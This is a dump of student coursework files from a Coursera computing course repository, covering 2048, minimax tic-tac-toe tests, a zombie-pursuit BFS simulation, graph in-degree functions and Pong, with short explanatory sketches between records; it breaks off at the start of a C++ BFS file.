"blob_id": "f0f3a829da8bfc787e171413d80cbe1bb4db5463",
"content_id": "155381ae4b5364eb6eb61a060843f3b313883236",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1400,
"license_type": "no_license",
"max_line_length": 557,
"num_lines": 11,
"path": "/Fundamentals of Computing Specialization/Principles of Computing (Part 1)/Mini-Project2 Game 2048/README.md",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "# Mini-project #2 - 2048(Full)\n\nImplemented the 2048 game logic in CodeSkulptor, a browser-based Python interpreter, as part of the coursework. To play the game go [here](http://www.codeskulptor.org/#user46_iYjoTGs3rX_51.py) and press the play button on the top left corner. \n\nMini-project overview taken from course page can be found below:\n* For this assignment, your task is to complete the implementation of a version of the 2048 game. Since we will provide a graphical user interface for the game, your task is to implement the game logic in terms of a **TwentyFortyEight** class in Python. Although the original game is played on a <a href=\"https://www.codecogs.com/eqnedit.php?latex=4&space;\\times&space;4\" target=\"_blank\"><img src=\"https://latex.codecogs.com/gif.latex?4&space;\\times&space;4\" title=\"4 \\times 4\" /></a> grid, your version should be able to have an arbitrary height and width.\n\n* We have provided the following [template](http://www.codeskulptor.org/#poc_2048_template.py) that contains an outline of the **TwentyFortyEight** class. The signature (name and parameters) of the functions, classes, and methods in this file must remain unchanged, but you may add any additional functions, methods, or other code that you need to.\n\nComplete project description can be found at : \n<https://www.coursera.org/learn/principles-of-computing-1/supplement/L0L0Y/mini-project-description>\n"
},
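The TwentyFortyEight class itself is not included in this snapshot. The core of the game logic the README describes is collapsing a single row or column; a plausible sketch of that step (the merge(line) name follows the course template, but this version is my own and untested against the grader):

    def merge(line):
        # slide non-zero tiles left, merging equal adjacent pairs once per move
        tiles = [t for t in line if t != 0]
        merged = []
        i = 0
        while i < len(tiles):
            if i + 1 < len(tiles) and tiles[i] == tiles[i + 1]:
                merged.append(2 * tiles[i])
                i += 2  # each tile participates in at most one merge
            else:
                merged.append(tiles[i])
                i += 1
        # pad with zeros back to the original length
        return merged + [0] * (len(line) - len(merged))

merge([2, 0, 2, 4]) returns [4, 4, 0, 0], and merge([2, 2, 2]) returns [4, 2, 0]: tiles slide left and each pair merges at most once per move.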
{
"alpha_fraction": 0.5425457954406738,
"alphanum_fraction": 0.5571528077125549,
"avg_line_length": 50.95783233642578,
"blob_id": "9c5ba8f9e7eb787d1d5233ff645a1db599a47b88",
"content_id": "01bc1b1e0078ca0e952739dcec2470c9a3022eb1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8626,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 166,
"path": "/Fundamentals of Computing Specialization/Principles of Computing (Part 2)/Mini-Project3 Tic-Tac-Toe(Minimax)/tic_tac_toe_minimax_testsuite.py",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "\"\"\"\nTesting suite for functions used in one implementation\nof Mini-max Tic-Tac-Toe player\n\"\"\"\nimport poc_simpletest as simpletest\nimport user46_NHM1TTnSvs_129 as ttt_minimax\nimport poc_ttt_provided as provided\n\n\nimport codeskulptor\ncodeskulptor.set_timeout(60)\n\n\nclass TestTicTacToeMinimax():\n \"\"\"\n function that tests the mm_move function\n of the Tic-Tac-Toe game with minimax mini-project\n \"\"\"\n def test_mm_move(self):\n # create a TestSuite object\n suite = simpletest.TestSuite() \n\n print \"running mm_move function test...\"\n\n # Test #1.1: check the base case for when the game is drawn and\n # no more legal moves are left\n board = provided.TTTBoard(3, False, \n [[provided.PLAYERO, provided.PLAYERX, provided.PLAYERO],\n [provided.PLAYERO, provided.PLAYERX, provided.PLAYERO],\n [provided.PLAYERX, provided.PLAYERO, provided.PLAYERX]])\n actual_move = ttt_minimax.mm_move(board, provided.PLAYERX)\n exp_move = (0, (-1, -1))\n # run the Test #1.1 and compare the expected vs actual output\n suite.run_test(str(actual_move), str(exp_move), \n \"Test #1.1: mm_move\")\n\n # Test #1.2: check the base case for when PLAYERX has won and no more\n # legal moves are left\n board = provided.TTTBoard(3, False, \n [[provided.PLAYERO, provided.PLAYERX, provided.PLAYERX],\n [provided.PLAYERO, provided.PLAYERX, provided.PLAYERO],\n [provided.PLAYERX, provided.PLAYERO, provided.PLAYERX]])\n actual_move = ttt_minimax.mm_move(board, provided.PLAYERX)\n exp_move = (1, (-1, -1))\n # run the Test #1.3 and compare the expected vs actual output\n suite.run_test(str(actual_move), str(exp_move), \n \"Test #1.2: mm_move\")\n \n # Test #1.3: check the base case for when PLAYERX has lost and no more\n # legal moves are left\n board = provided.TTTBoard(3, False, \n [[provided.PLAYERO, provided.PLAYERX, provided.PLAYERO],\n [provided.PLAYERO, provided.PLAYERX, provided.PLAYERO],\n [provided.PLAYERO, provided.PLAYERO, provided.PLAYERX]])\n actual_move = ttt_minimax.mm_move(board, provided.PLAYERX)\n exp_move = (-1, (-1, -1))\n # run the Test #1.3 and compare the expected vs actual output\n suite.run_test(str(actual_move), str(exp_move), \n \"Test #1.3: mm_move\")\n \n # Test #1.4: check the case when only one move is left, and choosing\n # results in PLAYERX winning\n board = provided.TTTBoard(3, False, \n [[provided.PLAYERO, provided.PLAYERX, provided.PLAYERX],\n [provided.PLAYERO, provided.PLAYERX, provided.PLAYERO],\n [provided.EMPTY, provided.PLAYERO, provided.PLAYERX]])\n actual_move = ttt_minimax.mm_move(board, provided.PLAYERX)\n exp_move = (1, (2, 0))\n # run the Test #1.4 and compare the expected vs actual output\n suite.run_test(str(actual_move), str(exp_move), \n \"Test #1.4: mm_move\")\n \n # Test #1.5: check the case when only two moves are left, and PLAYERO\n # minimizes its score so that it wins\n board = provided.TTTBoard(3, False, \n [[provided.PLAYERO, provided.PLAYERX, provided.PLAYERX],\n [provided.PLAYERO, provided.PLAYERX, provided.EMPTY],\n [provided.EMPTY, provided.PLAYERO, provided.PLAYERX]])\n actual_move = ttt_minimax.mm_move(board, provided.PLAYERO)\n exp_move = (-1, (2, 0))\n # run the Test #1.5 and compare the expected vs actual output\n suite.run_test(str(actual_move), str(exp_move), \n \"Test #1.5: mm_move\")\n \n # Test #1.6: check the case when two moves are left and the PLAYERO\n # minimizes to draw the game\n board = provided.TTTBoard(3, False, \n [[provided.PLAYERO, provided.PLAYERX, provided.EMPTY],\n [provided.PLAYERO, provided.PLAYERX, 
provided.EMPTY],\n [provided.PLAYERX, provided.PLAYERO, provided.PLAYERX]])\n actual_move = ttt_minimax.mm_move(board, provided.PLAYERO)\n exp_move = (0, (0, 2))\n # run the Test #1.6 and compare the expected vs actual output\n suite.run_test(str(actual_move), str(exp_move), \n \"Test #1.6: mm_move\")\n \n # Test #1.7: check to see if PLAYERO chooses the correct move\n # that will result in a draw\n board = provided.TTTBoard(3, False, \n [[provided.PLAYERO, provided.PLAYERX, provided.EMPTY],\n [provided.PLAYERO, provided.PLAYERX, provided.EMPTY],\n [provided.EMPTY, provided.PLAYERO, provided.PLAYERX]])\n actual_move = ttt_minimax.mm_move(board, provided.PLAYERX)\n exp_move = (0, (2, 0))\n # run the Test #1.7 and compare the expected vs actual output\n suite.run_test(str(actual_move), str(exp_move), \n \"Test #1.7: mm_move\")\n \n \n # Test #1.8: test another board configuration for the draw vs loss for PLAYERO\n board = provided.TTTBoard(3, False, \n [[provided.PLAYERX, provided.PLAYERO, provided.PLAYERX], \n [provided.PLAYERX, provided.PLAYERO, provided.PLAYERO], \n [provided.EMPTY, provided.PLAYERX, provided.EMPTY]])\n actual_move = ttt_minimax.mm_move(board, provided.PLAYERO)\n exp_move = (0, (2, 0))\n # run the Test #1.8 and compare the expected vs actual output\n suite.run_test(str(actual_move), str(exp_move), \n \"Test #1.8: mm_move\")\n\n\n # Test #1.9: test another board configuration for the draw vs loss for PLAYERO\n board = provided.TTTBoard(3, False, \n [[provided.PLAYERX, provided.PLAYERX, provided.PLAYERO],\n [provided.PLAYERO, provided.PLAYERX, provided.PLAYERX],\n [provided.EMPTY, provided.EMPTY, provided.PLAYERO]])\n actual_move = ttt_minimax.mm_move(board, provided.PLAYERO)\n exp_move = (0, (2, 1))\n # run the Test #1.9 and compare the expected vs actual output\n suite.run_test(str(actual_move), str(exp_move), \n \"Test #1.9: mm_move\")\n \n # Test #1.10: test to see if we get the correct score for a 2 by 2\n # board. Since PLAYERX made the first move, current player, PLAYERO\n # will lose no matter what move is selected. Thus, score should be 1\n board = provided.TTTBoard(2, False,\n [[provided.PLAYERX, provided.EMPTY],\n [provided.EMPTY, provided.EMPTY]])\n actual_score = ttt_minimax.mm_move(board, provided.PLAYERO)[0]\n exp_score = 1\n # run the Test #1.10 and compare the expected vs actual output\n suite.run_test(str(actual_score), str(exp_score), \n \"Test #1.10: mm_move\")\n\n\n # Test #1.11: Test the case for a game that just started i.e.\n # the board is empty except for the first move. Since both\n # player are minimzing their losses, it will result in a draw.\n # Therefore, we should get a score of 0\n board = provided.TTTBoard(3, False, \n [[provided.EMPTY, provided.EMPTY, provided.PLAYERX], \n [provided.EMPTY, provided.EMPTY, provided.EMPTY], \n [provided.EMPTY, provided.EMPTY, provided.EMPTY]])\n actual_score = ttt_minimax.mm_move(board, provided.PLAYERO)[0]\n exp_score = 0\n # run the Test #1.11 and compare the expected vs actual output\n suite.run_test(str(actual_score), str(exp_score), \n \"Test #1.11: mm_move\")\n\n # report number of tests and failures\n suite.report_results()\n print \n \n# test all functions of the word wangler pini-project\nminimax_sim = TestTicTacToeMinimax()\nminimax_sim.test_mm_move()\n\n"
},
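The module under test, user46_NHM1TTnSvs_129, is not part of this snapshot, so here is a self-contained sketch of the (score, (row, col)) contract the tests above assume: +1 when PLAYERX wins, -1 when PLAYERX loses, 0 for a draw, and the move (-1, -1) once the game is over. The board helpers are mine, and the sketch ignores the specific tie-breaking moves the grader checks.

    X, O, EMPTY = "X", "O", " "

    def lines(board):
        # rows, columns, and both diagonals of a 3x3 board
        return ([list(row) for row in board]
                + [list(col) for col in zip(*board)]
                + [[board[i][i] for i in range(3)],
                   [board[i][2 - i] for i in range(3)]])

    def game_score(board):
        # +1 if X has won, -1 if O has won, 0 for a draw, None while in progress
        for line in lines(board):
            if line[0] != EMPTY and line.count(line[0]) == 3:
                return 1 if line[0] == X else -1
        if all(cell != EMPTY for row in board for cell in row):
            return 0
        return None

    def mm_move(board, player):
        # full-depth minimax: X maximizes the score, O minimizes it
        score = game_score(board)
        if score is not None:
            return score, (-1, -1)
        best = None
        for r in range(3):
            for c in range(3):
                if board[r][c] == EMPTY:
                    board[r][c] = player
                    result, _ = mm_move(board, O if player == X else X)
                    board[r][c] = EMPTY  # undo the trial move
                    if best is None or (player == X and result > best[0]) \
                            or (player == O and result < best[0]):
                        best = (result, (r, c))
        return best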
{
"alpha_fraction": 0.5394195318222046,
"alphanum_fraction": 0.544834315776825,
"avg_line_length": 38.4487190246582,
"blob_id": "7a919df30ed67b5a30a184cc421973e300db0c89",
"content_id": "0a45704a3df3dd4de7c93300b9890973f208ea64",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9234,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 234,
"path": "/Fundamentals of Computing Specialization/Principles of Computing (Part 2)/Mini-Project1 Zombie Apocalypse/zombie_apocalypse.py",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "\"\"\"\nStudent portion of Zombie Apocalypse mini-project\n\"\"\"\n\nimport random\nimport poc_grid\nimport poc_queue\nimport poc_zombie_gui\n\n# global constants\nEMPTY = 0 \nFULL = 1\nFOUR_WAY = 0\nEIGHT_WAY = 1\nOBSTACLE = 5\nHUMAN = 6\nZOMBIE = 7\n\n\nclass Apocalypse(poc_grid.Grid):\n \"\"\"\n Class for simulating zombie pursuit of human on grid with\n obstacles\n \"\"\"\n\n def __init__(self, grid_height, grid_width, obstacle_list = None, \n zombie_list = None, human_list = None):\n \"\"\"\n Create a simulation of given size with given obstacles,\n humans, and zombies\n \"\"\"\n poc_grid.Grid.__init__(self, grid_height, grid_width)\n if obstacle_list != None:\n for cell in obstacle_list:\n self.set_full(cell[0], cell[1])\n if zombie_list != None:\n self._zombie_list = list(zombie_list)\n else:\n self._zombie_list = []\n if human_list != None:\n self._human_list = list(human_list) \n else:\n self._human_list = []\n \n def clear(self):\n \"\"\"\n Set cells in obstacle grid to be empty\n Reset zombie and human lists to be empty\n \"\"\"\n # clear all grid cell to be passable i.e. cell that\n # are EMPTY\n poc_grid.Grid.clear(self)\n # reinitialize the human and zombie lists to\n # be empty\n self._human_list = []\n self._zombie_list = []\n \n \n def add_zombie(self, row, col):\n \"\"\"\n Add zombie to the zombie list\n \"\"\"\n self._zombie_list.append((row,col))\n \n def num_zombies(self):\n \"\"\"\n Return number of zombies\n \"\"\"\n return len(self._zombie_list) \n \n def zombies(self):\n \"\"\"\n Generator that yields the zombies in the order they were\n added.\n \"\"\"\n for zombie in self._zombie_list:\n yield zombie\n \n\n def add_human(self, row, col):\n \"\"\"\n Add human to the human list\n \"\"\"\n self._human_list.append((row,col))\n \n def num_humans(self):\n \"\"\"\n Return number of humans\n \"\"\"\n return len(self._human_list)\n \n def humans(self):\n \"\"\"\n Generator that yields the humans in the order they were added.\n \"\"\"\n for human in self._human_list:\n yield human\n \n def compute_distance_field(self, entity_type):\n \"\"\"\n Function computes and returns a 2D distance field\n Distance at member of entity_list is zero\n Shortest paths avoid obstacles and use four-way distances\n \"\"\"\n # store the height and width of the grid\n height = poc_grid.Grid.get_grid_height(self)\n width = poc_grid.Grid.get_grid_width(self)\n # create a grid that tracks the visited cells of the grid\n # and intialize all locations to be EMPTY i.e. 
not visited\n visited = [[EMPTY for dummy_col in range(width)] \n for dummy_row in range(height)]\n \n # create a distance field to keep track of the shortest\n # distance from a entity type and initialize it as height*width\n # since the distance larger than any possible distance\n distance_field = [[height * width for dummy_col in range(width)] \n for dummy_row in range(height)]\n \n # create a queue for breath first search\n boundary = poc_queue.Queue()\n # map the respective entity type to its generator function\n map_entity_type = {HUMAN: self.humans, ZOMBIE: self.zombies}\n # add all human or zombie locations to the queue \n # and mark those locations as visited and the\n # distance at that location as zero\n for row, col in map_entity_type[entity_type]():\n boundary.enqueue((row, col))\n visited[row][col] = FULL\n distance_field[row][col] = 0\n # begin the breath first search\n while(len(boundary) > 0 ):\n # get the current cell i.e the grid location\n # of the zombie/human\n current_cell = boundary.dequeue()\n # get all of the current cells four neighbours and iterate\n # over them\n for neighbor_cell in poc_grid.Grid.four_neighbors(self, \n current_cell[0], \n current_cell[1]):\n # if neigboring cell is passable and has not yet been visited\n # add it to the queue for BFS, mark it as visited and \n # update the distance. \n if (poc_grid.Grid.is_empty(self, neighbor_cell[0], neighbor_cell[1]) \n and visited[neighbor_cell[0]][neighbor_cell[1]] == EMPTY):\n boundary.enqueue(neighbor_cell)\n visited[neighbor_cell[0]][neighbor_cell[1]] = FULL\n distance_field[neighbor_cell[0]][neighbor_cell[1]] = (\n distance_field[current_cell[0]][current_cell[1]] + 1)\n \n return distance_field\n \n def move_humans(self, zombie_distance_field):\n \"\"\"\n Function that moves humans away from zombies, diagonal moves\n are allowed\n \"\"\"\n # initialize the list that stores the new location of the \n # humans after each step of the simulation\n new_human_locs = []\n # iterate over all human locations using it's generator\n for human in self.humans():\n # initialize the maximum distance that the human\n # can travel after each step of simulation as\n # the current human location\n max_dis = zombie_distance_field[human[0]][human[1]]\n # store the location of this distance that maximizes\n # its location from the nearest zombie\n safest_loc = human\n # get all 8 neighboring cell of this current human \n neighbors = poc_grid.Grid.eight_neighbors(self, \n human[0], human[1])\n # iterate over all neigboring cells to find which \n # neigboring cell maximizes the current human's\n # distance from the nearest zombie\n for neighbor in neighbors:\n if (poc_grid.Grid.is_empty(self, \n neighbor[0], \n neighbor[1]) \n and zombie_distance_field[neighbor[0]][neighbor[1]] > max_dis):\n max_dis = zombie_distance_field[neighbor[0]][neighbor[1]]\n safest_loc = neighbor\n \n # store this location that maximizes current human's\n # distance from the nearest zombie\n new_human_locs += [safest_loc]\n # update the existing human locations list with the new humans\n # locations found earlier\n self._human_list = new_human_locs\n\n \n def move_zombies(self, human_distance_field):\n \"\"\"\n Function that moves zombies towards humans, no diagonal moves\n are allowed\n \"\"\"\n # initialize the list that stores the new location of the \n # zombie after each step of the simulation \n new_zombie_locs = []\n # iterate over all zombie locations using it's generator \n for zombie in self.zombies():\n # initialize the current zombie 
location as the \n # location that minimizes its distance from nearest\n # human\n best_loc = zombie\n # intialize the current zombie location's distance\n # on the human distance field as the minimum distance.\n # This location becomes nearest location to human\n # if no neigbhoring cells are smaller than this distance\n min_dis = human_distance_field[zombie[0]][zombie[1]]\n # get all the neigboring cells of the current zombie\n neighbors = poc_grid.Grid.four_neighbors(self, \n zombie[0], zombie[1])\n # iterate over all neigboring cells to find which \n # neigboring cell minimize the current zombie's\n # distance from the nearest human\n for neighbor in neighbors:\n if (poc_grid.Grid.is_empty(self, \n neighbor[0], \n neighbor[1]) \n and human_distance_field[neighbor[0]][neighbor[1]] < min_dis):\n min_dis = human_distance_field[neighbor[0]][neighbor[1]]\n best_loc = neighbor\n \n # store this location that minimizes current zombie's\n # distance from the nearest human. \n new_zombie_locs += [best_loc]\n\n self._zombie_list = new_zombie_locs\n\n\n# Start up gui for simulation - You will need to write some code above\n# before this will work without errors\n\npoc_zombie_gui.run_gui(Apocalypse(30, 40))\n\n\n\n"
},
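compute_distance_field above leans on the course's poc_grid and poc_queue modules. The same breadth-first flood fill can be sketched stand-alone with the standard library, assuming a grid of booleans where True means passable; the function name distance_field and that encoding are mine:

    from collections import deque

    def distance_field(grid, sources):
        # grid: 2D list of booleans, True = passable
        # sources: list of (row, col) seed cells (the zombies or humans)
        # returns shortest four-way distances from any source, avoiding obstacles
        height, width = len(grid), len(grid[0])
        dist = [[height * width] * width for _ in range(height)]
        queue = deque(sources)
        for row, col in sources:
            dist[row][col] = 0
        while queue:
            row, col = queue.popleft()
            for nrow, ncol in ((row - 1, col), (row + 1, col),
                               (row, col - 1), (row, col + 1)):
                if (0 <= nrow < height and 0 <= ncol < width and grid[nrow][ncol]
                        and dist[nrow][ncol] == height * width):
                    dist[nrow][ncol] = dist[row][col] + 1
                    queue.append((nrow, ncol))
        return dist

As in the class version, the initial value height * width doubles as the "unvisited" sentinel, since no shortest path on the grid can be that long.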
{
"alpha_fraction": 0.8100558519363403,
"alphanum_fraction": 0.8100558519363403,
"avg_line_length": 35,
"blob_id": "dd21695a42bbc226043167dda65e94200393cfdc",
"content_id": "ac501df097e1773103eac005a33241618c3ea902",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 179,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 5,
"path": "/Fundamentals of Computing Specialization/README.md",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "# Fundamentals of Computing Specialization courses offered by Rice on Coursera\n\nAll the mini-projects run on the CodeSkulptor environment found at:\n\n<http://www.codeskulptor.org/>"
},
{
"alpha_fraction": 0.5673282146453857,
"alphanum_fraction": 0.5868702530860901,
"avg_line_length": 27.728069305419922,
"blob_id": "aad3699c0cd74147395663c37bb86fa4e7a47ccd",
"content_id": "d4a646b7422260c7927810d451b07815c00429aa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3275,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 114,
"path": "/Fundamentals of Computing Specialization/Algorithmic Thinking (Part 1)/Module 1/alg_project1_solution.py",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "\"\"\"\nFunctions for Prject #1: \"Degree Distribution for Graphs\". These functions will be\nused in the Application #1: \"Analysis of Citation Graphs\"\n\"\"\"\n\n# define directed graph constants for testing\nEX_GRAPH0 = {\n 0 : set([1, 2]),\n 1 : set(),\n 2 : set(),\n }\n\nEX_GRAPH1 = {\n 0 : set([1, 4, 5]),\n 1 : set([2, 6]),\n 2 : set([3]),\n 3 : set([0]),\n 4 : set([1]),\n 5 : set([2]),\n 6 : set([]),\n }\n\nEX_GRAPH2 = {\n 0 : set([1, 4, 5]),\n 1 : set([2, 6]),\n 2 : set([3, 7]),\n 3 : set([7]),\n 4 : set([1]),\n 5 : set([2]),\n 6 : set(),\n 7 : set([3]),\n 8 : set([1, 2]),\n 9 : set([0, 3, 4, 5, 6, 7]),\n }\n\ndef make_complete_graph(num_nodes):\n \"\"\"\n create and return a complete graph with nodes from\n 0 to num_nodes - 1 for num_nodes > 0. Otherwise\n the function returns a dictionary corresponding to\n the empty graph\n\n Arguments:\n num_nodes {integer} -- number of nodes for the graph\n\n Returns:\n dictionary -- returns a dictionary corresponding to a complete directed\n graph with the specified number of nodes.\n \"\"\"\n # local variable for the complete graph\n graph = {}\n\n # return an empty graph if num_nodes is not positive\n if num_nodes <= 0:\n return graph\n\n for node in range(num_nodes):\n # create an adjacency list for a directed complete graph with no\n # self loops or parallel edges\n graph[node] = set([val for val in range(num_nodes) if val != node])\n\n return graph\n\ndef compute_in_degrees(digraph):\n \"\"\"\n computes the in-degree of the nodes in a graph\n\n Arguments:\n digraph {dictionary} -- a directed graph with no self loop or parallel edges\n\n Returns:\n dictionary -- returns a dictionary with same set of keys(nodes) as digraph\n whose corresponding values are the number of edges whose\n head matches a particular node\n\n \"\"\"\n\n # initialize the in degree for the nodes of digraph to 0\n in_degree = dict(zip(digraph.keys(), len(digraph) * [0]))\n\n for tail_node in digraph:\n for head_node in digraph[tail_node]:\n in_degree[head_node] += 1\n\n return in_degree\n\ndef in_degree_distribution(digraph):\n \"\"\"\n computes the unnormalized distribution of the in-degrees of the graph\n\n Arguments:\n digraph {dictionary} -- a directed graph with no self loops or parallel\n edges\n\n Returns:\n dictionary -- unnormalized distribution of the in-degrees of the graph\n with key being the in-degree of nodes in the graph and\n the value associated with each particular in-degree is\n the number of nodes with that in-degree. In-degrees with\n no corresponding nodes in the graph are not included in\n the dictionary.\n \"\"\"\n # initialize the dictionary to store\n in_degree_dist = {}\n # get the in-degree for each node\n in_degrees = compute_in_degrees(digraph)\n\n for degree_vals in in_degrees.values():\n if in_degree_dist.has_key(degree_vals):\n in_degree_dist[degree_vals] += 1\n else:\n in_degree_dist[degree_vals] = 1\n\n return in_degree_dist\n"
},
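As a hand-checked example (mine, not part of the solution file): in EX_GRAPH1, only node 3 points at node 0, while nodes 1 and 2 are each pointed at twice, so five nodes have in-degree 1 and two have in-degree 2.

    # Expected behavior of the functions above on the EX_GRAPH1 constant
    # (run under Python 2, which is what this solution targets):
    #
    #   compute_in_degrees(EX_GRAPH1)
    #   => {0: 1, 1: 2, 2: 2, 3: 1, 4: 1, 5: 1, 6: 1}
    #
    #   in_degree_distribution(EX_GRAPH1)
    #   => {1: 5, 2: 2}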
{
"alpha_fraction": 0.5561786890029907,
"alphanum_fraction": 0.5880874395370483,
"avg_line_length": 31.727848052978516,
"blob_id": "4643d9bb45e7e9fd822c20764bac3ff21d05a514",
"content_id": "3353216b4d389766de79e981dff271fd7e92ab1f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5171,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 158,
"path": "/Fundamentals of Computing Specialization/Interactive Programming in Python (Part 1)/Mini-Project4 Pong/pong.py",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "# Implementation of classic arcade game Pong\n\nimport simplegui\nimport random\n\n# initialize globals - pos and vel encode vertical info for paddles\nWIDTH = 600\nHEIGHT = 400 \nBALL_RADIUS = 20\nPAD_WIDTH = 8\nPAD_HEIGHT = 80\nHALF_PAD_WIDTH = PAD_WIDTH / 2\nHALF_PAD_HEIGHT = PAD_HEIGHT / 2\nLEFT = False\nRIGHT = True\nball_pos = [WIDTH / 2, HEIGHT / 2]\nball_vel = [5, 5] # pixels per update (1/60 seconds)\npaddle1_pos = HEIGHT/2 - HALF_PAD_HEIGHT\npaddle2_pos = HEIGHT/2 - HALF_PAD_HEIGHT\npaddle1_vel = 0\npaddle2_vel = 0\nscore1 = 0\nscore2 = 0\nPAD_VEL = 4\n\n# initialize ball_pos and ball_vel for new bal in middle of table\n# if direction is RIGHT, the ball's velocity is upper right, else upper left\ndef spawn_ball(direction):\n global ball_pos, ball_vel # these are vectors stored as lists\n \n ball_pos[0] = WIDTH / 2\n ball_pos[1] = HEIGHT / 2\n \n ball_vel[0] = random.randrange(2, 4)\n ball_vel[1] = -random.randrange(1, 3)\n \n # change the horizontal velocity direction if the ball needs to be spawn in the LEFT direction\n if (direction == LEFT):\n ball_vel[0] = -ball_vel[0]\n\n# define event handlers\ndef new_game():\n global paddle1_pos, paddle2_pos, paddle1_vel, paddle2_vel # these are numbers\n global score1, score2 # these are ints\n # reset the scores\n score1 = 0\n score2 = 0\n # spawn ball in random direction\n spawn_ball(random.randrange(LEFT,RIGHT+1)) \n\ndef draw(canvas):\n global score1, score2, paddle1_pos, paddle2_pos, ball_pos, ball_vel\n \n # draw mid line and gutters\n canvas.draw_line([WIDTH / 2, 0],[WIDTH / 2, HEIGHT], 1, \"White\")\n canvas.draw_line([PAD_WIDTH, 0],[PAD_WIDTH, HEIGHT], 1, \"White\")\n canvas.draw_line([WIDTH - PAD_WIDTH, 0],[WIDTH - PAD_WIDTH, HEIGHT], 1, \"White\")\n \n # Update ball position\n ball_pos[0] += ball_vel[0]\n ball_pos[1] += ball_vel[1]\n \n # determine whether paddle and ball collide \n if (ball_pos[0] <= BALL_RADIUS + PAD_WIDTH):\n # ball is touching or passed the left side of the canvas\n if ( ball_pos[1] - BALL_RADIUS > paddle1_pos + PAD_HEIGHT or ball_pos[1] + BALL_RADIUS < paddle1_pos ):\n spawn_ball(RIGHT)\n score2 += 1\n else:\n ball_vel[0] = -1.1* ball_vel[0]\n ball_vel[1] = 1.1*ball_vel[1]\n \n elif ball_pos[0] >= WIDTH - BALL_RADIUS - PAD_WIDTH:\n # ball is touching or passed the right side of the canvas\n if ( ball_pos[1] - BALL_RADIUS > paddle2_pos + PAD_HEIGHT or ball_pos[1] + BALL_RADIUS < paddle2_pos ):\n spawn_ball(LEFT)\n score1 +=1\n else:\n ball_vel[0] = -1.1*ball_vel[0] \n ball_vel[1] = 1.1*ball_vel[1]\n \n # reflect the ball when colliding with the top or bottom of the canvas \n if (ball_pos[1] >= HEIGHT - BALL_RADIUS):\n ball_vel[1] = -ball_vel[1]\n \n elif ( ball_pos[1] <= BALL_RADIUS):\n ball_vel[1] = -ball_vel[1]\n \n # draw the scores so before ball so that it is behind the ball \n canvas.draw_text(str(score1), (WIDTH/4, HEIGHT/8), 40, 'White')\n canvas.draw_text(str(score2), (WIDTH*3.0/4, HEIGHT/8), 40, 'White') \n \n # draw ball\n canvas.draw_circle(ball_pos, BALL_RADIUS, 1, \"White\", \"White\")\n \n # update paddle's vertical position, keep paddle on the screen\n paddle1_pos += paddle1_vel\n paddle2_pos += paddle2_vel\n \n if (paddle1_pos < 0 ):\n paddle1_pos = 0\n elif (paddle1_pos > HEIGHT - PAD_HEIGHT):\n paddle1_pos = HEIGHT - PAD_HEIGHT\n \n if (paddle2_pos < 0 ):\n paddle2_pos = 0\n elif (paddle2_pos > HEIGHT - PAD_HEIGHT):\n paddle2_pos = HEIGHT - PAD_HEIGHT \n \n # draw paddles\n canvas.draw_polygon([[0, paddle1_pos], [PAD_WIDTH, paddle1_pos],\n [PAD_WIDTH,paddle1_pos + PAD_HEIGHT],\n 
[0, paddle1_pos + PAD_HEIGHT]], 1, 'White', 'White')\n \n canvas.draw_polygon([[WIDTH - PAD_WIDTH, paddle2_pos], [WIDTH, paddle2_pos],\n [WIDTH, paddle2_pos + PAD_HEIGHT],\n [WIDTH - PAD_WIDTH, paddle2_pos + PAD_HEIGHT]], 1, 'White', 'White')\n \ndef keydown(key):\n global paddle1_vel, paddle2_vel\n \n if (key == simplegui.KEY_MAP[\"down\"]):\n paddle2_vel += PAD_VEL\n \n if (key == simplegui.KEY_MAP[\"up\"]):\n paddle2_vel -= PAD_VEL\n\n if (key == simplegui.KEY_MAP[\"s\"]):\n paddle1_vel += PAD_VEL\n \n if (key == simplegui.KEY_MAP[\"w\"]):\n paddle1_vel -= PAD_VEL\n \ndef keyup(key):\n global paddle1_vel, paddle2_vel\n \n if (key == simplegui.KEY_MAP[\"down\"]):\n paddle2_vel = 0\n \n if (key == simplegui.KEY_MAP[\"up\"]):\n paddle2_vel = 0\n \n if (key == simplegui.KEY_MAP[\"s\"]):\n paddle1_vel = 0\n \n if (key == simplegui.KEY_MAP[\"w\"]):\n paddle1_vel = 0\n \n# create frame\nframe = simplegui.create_frame(\"Pong\", WIDTH, HEIGHT)\nrestartButton = frame.add_button('restart', new_game)\nframe.set_draw_handler(draw)\nframe.set_keydown_handler(keydown)\nframe.set_keyup_handler(keyup)\n\n# start frame\nnew_game()\nframe.start()\n"
},
{
"alpha_fraction": 0.5346689820289612,
"alphanum_fraction": 0.5752612948417664,
"avg_line_length": 28.53191566467285,
"blob_id": "601c2b92bb3702ffac4ba237922e8205a3cc5ff0",
"content_id": "f1436a42f575eff8b0f05221e5de3f230df9df48",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 5752,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 188,
"path": "/Algorithms on Graphs/Assignment3/bfs.cpp",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
